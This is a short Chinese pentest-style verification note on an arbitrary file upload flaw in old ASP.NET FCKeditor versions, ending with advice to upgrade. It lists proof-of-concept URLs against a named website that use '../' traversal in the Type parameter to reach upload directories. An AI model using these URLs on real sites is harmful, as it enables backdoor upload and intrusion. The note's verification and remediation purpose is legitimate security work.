漏洞验证-FCKeditor ASP.NET版本任意文件上传

一、漏洞描述

CKSource FCKeditor（现称CKEditor）是波兰CKSource公司的一套开源的、基于网页的文字编辑器。该编辑器具有轻量化、易于安装等特点。FCKeditor低版本存在任意文件上传漏洞，攻击者可利用该漏洞上传后门脚本并执行恶意代码。

二、验证POC

所有类型内容：http://www.rajc.net/fckeditor/editor/filemanager/browser/default/browser.html?Type=&Connector=connectors/aspx/connector.aspx

上一级目录：http://www.rajc.net/fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspx

上两级目录：http://www.rajc.net/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../&Connector=connectors/aspx/connector.aspx

上一级目录和上两级目录，这个地方一定要注意，不然不知道网站的目录是怎么分布的，安恒的扫描器是/UserFiles/File/这个目录，第一个URL的是/UserFiles/File/file/这个目录，这是一个很坑的点，漏洞验证验证了半天没有，所以上一级目录和上两级目录一定要去看，去确认一下。

三、验证截图

四、整改建议

联系官方升级至最新版本